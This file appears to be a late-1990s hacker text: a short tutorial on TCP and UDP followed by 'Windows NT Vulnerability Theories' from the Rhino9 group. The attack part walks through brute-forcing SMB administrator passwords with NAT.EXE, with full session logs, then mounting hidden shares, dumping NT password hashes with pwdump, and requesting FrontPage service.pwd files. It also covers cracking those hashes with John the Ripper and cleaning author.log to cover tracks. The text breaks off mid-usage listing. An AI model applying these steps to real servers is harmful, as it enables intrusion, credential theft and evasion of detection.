-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ The TCP/IP Protcols: The Transmission Control Protocol (TCP) -ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Most Internet applications and services use the Transport Control Protocol (TCP) to implement the transport layer. TCP provides a reliable, connection-oriented, continuous-stream protocol. The implications of these characteristics are: o Reliable: When TCP segments, the smallest unit of a TCP transmission are lost or interupted, the TCP implentation will detect this and retransmit necessary segments. o Connection-oriented: TCP sets up a connection with a remote system by transmitting control information, often known as a handshake, before beginning a communication. At the end of the connect, a similar closing handshake it performed to end the transmission. o Continous-stream: TCP provides a communications medium that allows for an arbitrary number of bytes to be sent and received smoothly; once a connection has been established, TCP segments provide the application layer the appearance of a continous flow of data. It is because of these characteristics, that it is easy to see why TCP would be used by most Internet application and services. TCP makes it very easy to create a network application, freeing you from worrying how the data is broken up, or about coding correction routines. However, TCP requires a significant amount of overhead, and retransmission of lost data may not be required, because the information could have expired, thus making UDP the popular choice for more simple applications and services. Below is a chart, comparing TCP to both UDP and IP, showing strengths and weaknesses. ÚÄÄÄÄÄÂÄÄÄÄÄÂÄÄÄÄÄ¿ ³ IP ³ UDP ³ TCP ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´ ³ connection-oriented ³ no ³ no ³ yes ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´ ³ message boundaries ³ yes ³ yes ³ no ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´ ³ data checksum ³ no ³ opt ³ yes ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´ ³ positive ack. ³ no ³ no ³ yes ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´ ³ timeout and rexmit ³ no ³ no ³ yes ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´ ³ duplicate detection ³ no ³ no ³ yes ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´ ³ sequencing ³ no ³ no ³ yes ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´ ³ flow control ³ no ³ no ³ yes ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÙ An important addressing scheme which TCP defines is the port. Ports are used to separate various TCP communications streams that are running concurrently on the same system. For server applications, which wait for TCP clients to initiate contact, a specific port can be established from where communications will originate. These concepts all come together in a programming abstraction known as sockets. TCP socket basics will be covered later on. The diagrams below show you how TCP makes a connection. TCP using something called a three way handshake. Basically, the server is always running, and waits for clients to starts the connection. The client passes a SYN (synchronous) that is randomly generated. The sever replies with an ACK (acknowledgment), which is the SYN the client generated plus 1. The server also sends a SYN (randomly generated) back to the client. The client then responds with and ACK, which is the server's SYN plus 1. The connection is now established. Client Server Generate x -------- SYN(x) ---------> Receive SYN(x) Generate y Receive SYN(y) <--- ACK(x+1)/SYN(y) ---- Send ACK(x+1) and ACK(x+1) and SYN(y) Send ACK(y+1) -------- ACK(y+1) -------> Receive ACK(y+1) Connection Established -ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ The TCP/IP Protcols: The User Datagram Protocol (UDP) -ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ UDP is a low overhead alternative to TCP for host to host communications. In contrast to TCP, UDP has the following characteristics: o Unreliable: UDP has no mechanisms for detecting errors, nor retransmitting lost or corrupted information. o Connectionless: UDP does not negotiate a connection before transmitting data. Information is sent with the assumption that the recipient will be listening. o Message-oriented: UDP allows applications to send self-contained messages within UDP datagrams, the unit of UDP transmissions. The application must package all information within individual datagrams. For some applications, UDP is a more fitting protocol than TCP. For time protocols, lost data indicating the current time would be invalid and outdated by the time that it was retransmitted. Another example is NFS, the Network File System can operate more efficently and provide more reliablity at the application layer, and thusly uses UDP. As with TCP, UDP provides the addressing scheme of ports, allowing for many applications to simultaneously send and receive datagrams. UDP ports are distinct from TCP ports. For example, one application can respond to the UDP port 512 while another unrelated service handles TCP port 512. To see which ports use which protocol and service, look at a copy of /etc/services, available with any UNIX box. [Windows NT Vulnerability Theories Version 2...........................vacuum] ==========Windows NT Vulnerability Theories Version 2============= by Vacuum & Chame|eon of Rhino9 [www.rhino9.org is coming] [http://www.technotronic.com -- vacuum@technotronic.com] December 04, 1997 Look for a NT Security Suite to be released by Rute soon based on the theories mentioned in this text. Special thanks to NeonSurge creator of rhino9, l0pht for l0phtcrack 1.5, Jeremy Allison for pwdump, Andrew Tridgell for NAT and SAMBA, CyberToast, Darkling, Rute, pSId for coding a linux version, and Microsoft for creating tools that have nice holes in them. All mentioned programs available at www.technotronic.com This r9-nt-v2.zip includes: vacuum.txt This text file. vac1.cap Network Monitor packet sniffing sessions in native format.This capture is a frontpage hack session. sniff.txt ASCII version which highlighs the which does not require Network Monitor to be read as well as Highlights the vac1.cap session. service.pwd-scanner.c Scan for frontpage extsension serrvice.pwd file for use on Linux based machines. dnscan lists all servers in a particular domain and can be used as an input file for service.pwd-scanner. datapipe.c datapipe is similar to bounce.c gcc -o datapipe datapipe.c chmod 755 datapipe ./datapipe 2222 23 www.target.com where 2222 is the source port and 23 is the destination port for frontpage attack this would be 80 If any programmers want to go HARDCORE with me, I have setup the appropriate symbol files installed as well as the capability of running a "remote" debug through the modem to share my ideas/theories. ==========NetBIOS Attack Program================================== Verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1 NAT.EXE [-o filename] [-u userlist] [-p passlist]
OPTIONS -o Specify the output file. All results from the scan will be written to the specified file, in addition to standard output. -u Specify the file to read usernames from. Usernames will be read from the specified file when attempt- ing to guess the password on the remote server. Usernames should appear one per line in the speci- fied file. -p Specify the file to read passwords from. Passwords will be read from the specified file when attempt- ing to guess the password on the remote server. Passwords should appear one per line in the speci- fied file.
Addresses should be specified in comma deliminated format, with no spaces. Valid address specifica- tions include: hostname - "hostname" is added 127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through 127.0.0.20. hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through 127.0.0.1 All combinations of hostnames and address ranges as specified above are valid. Note that NAT.EXE will ip scan for netbios shares as performed above. Comparing NAT.EXE to Microsoft's own executables: C:\nbtstat -A 204.73.131.11 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- STUDENT1 <20> UNIQUE Registered STUDENT1 <00> UNIQUE Registered DOMAIN1 <00> GROUP Registered DOMAIN1 <1C> GROUP Registered DOMAIN1 <1B> UNIQUE Registered STUDENT1 <03> UNIQUE Registered DOMAIN1 <1E> GROUP Registered DOMAIN1 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-C0-4F-C4-8C-9D Here is a partial NetBIOS 16th bit listing: Computername <00> UNIQUE workstation service name <00> GROUP domain name Server <20> UNIQUE Server Service name Computername <03> UNIQUE Registered by the messenger service. This is the computername to be added to the LMHOSTS file which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood. Username <03> Registered by the messenger service. Domainname <1B> Registers the local computer as the master browser for the domain Domainname <1C> Registers the computer as a domain controller for the domain (PDC or BDC) Domainname <1D> Registers the local client as the local segments master browser for the domain Domainname <1E> Registers as a Group NetBIOS Name Network Monitor Name Network Monitor Agent <06> RAS Server <1F> Net DDE <21> RAS Client C:\net view 204.73.131.11 Shared resources at 204.73.131.11 Share name Type Used as Comment ------------------------------------------------------------------------------ NETLOGON Disk Logon server share Test Disk The command completed successfully. NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown. C:\net use /? The syntax of this command is: NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]] [/USER:[domainname\]username] [[/DELETE] | [/PERSISTENT:{YES | NO}]] NET USE [devicename | *] [password | *]] [/HOME] NET USE [/PERSISTENT:{YES | NO}] C:\net use x: \\204.73.131.11\test The command completed successfully. C:\unzipped\nat10bin>net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK X: \\204.73.131.11\test Microsoft Windows Network OK \\204.73.131.11\test Microsoft Windows Network The command completed successfully. C:\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30 [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt [*]--- Checking host: 204.73.131.11 [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Mon Dec 01 07:44:34 1997 [*]--- Timezone is UTC-6.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Was not able to establish session with no password [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password' [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password' [*]--- Obtained server information: Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- ------- ADMIN$ Disk: Remote Admin C$ Disk: Default share IPC$ IPC: Remote IPC NETLOGON Disk: Logon server share Test Disk: [*]--- This machine has a browse list: Server Comment --------- ------- STUDENT1 [*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$ [*]--- Checking write access in: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$ [*]--- Attempting to access share: \\*SMBSERVER\C$ [*]--- WARNING: Able to access share: \\*SMBSERVER\C$ [*]--- Checking write access in: \\*SMBSERVER\C$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$ [*]--- Attempting to access share: \\*SMBSERVER\NETLOGON [*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON [*]--- Checking write access in: \\*SMBSERVER\NETLOGON [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON [*]--- Attempting to access share: \\*SMBSERVER\Test [*]--- WARNING: Able to access share: \\*SMBSERVER\Test [*]--- Checking write access in: \\*SMBSERVER\Test [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test [*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access If Default share of Everyone/Full Control. Done it is hacked. ==========Frontpage Extension Scanner & Cracker======================== C:\pwdump 204.73.131.11 NOTE: This is the pwdump from the webserver the Lan Manager password is set to "password". Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain:: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain:: STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253::: ketan:1005:********************************:********************************::: mari:1006:********************************:********************************::: meng:1007:********************************:********************************::: IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access:: The #haccess.ctl file: # -FrontPage- Options None order deny,allow deny from all AuthName default_realm AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp Executing fpservwin.exe allows frontpage server extensions to be installed on port 443 (HTTPS)Secure Sockets Layer port 80 (HTTP) NOTE: The Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be used instead of Frontpage. The following is a list of the Internet Information server files location in relation to the local hard drive (C:) and the web (www.target.com) C:\InetPub\wwwroot C:\InetPub\scripts /Scripts C:\InetPub\wwwroot\_vti_bin /_vti_bin C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut C:\InetPub\cgi-bin /cgi-bin C:\InetPub\wwwroot\srchadm /srchadm C:\WINNT\System32\inetserv\iisadmin /iisadmin C:\InetPub\wwwroot\_vti_pvt C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample C:\Program Files\Microsoft FrontPage\_vti_bin C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm NOTE: If Index Information Server running under Internet Information Server. service.pwd is our goal, although lots of servers are not password protected and can be exploited easily. queryhit.htm if found can be used to get service.pwd search for "#filename=*.pwd" FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to: service.pwd contains the list of users and passwords for the FrontPage web. service.grp contains the list of groups (one group for authors and one for administrators in FrontPage). On Netscape servers, there are no service.grp files. The Netscape password files are: administrators.pwd for administrators authors.pwd for authors and administrators users.pwd for users, authors, and administrators NOTE: Name and password are case sensitive Scanning PORT 80 or 443 options: GET /_vti_inf.html #Ensures that frontpage server extensions are installed. GET /_vti_pvt/service.pwd #Contains the encrypted password files. Not used on IIS and WebSite servers GET /_vti_pvt/authors.pwd #On Netscape servers only. Encrypted names and passwords of authors. GET /_vti_pvt/administrators.pwd GET /_vti_log/author.log #If author.log is there it will need to be cleaned to cover your tracks GET /samples/search/queryhit.htm # If service.pwd is obtained it will look similar to this: Vacuum:SGXJVl6OJ9zkE The above password is apple Turn it into DES format: Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash and save it as service.txt The run your favorite unix password cracker like John The Ripper C:\john -w:dictionary.txt service.txt Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files] Flags: -pwfile:[,..] specify passwd file(s) (wildcards allowed) -wordfile: specify wordlist file -restore[:] restore session [from ] -user:login|uid[,..] only crack this (these) user(s) -timeout: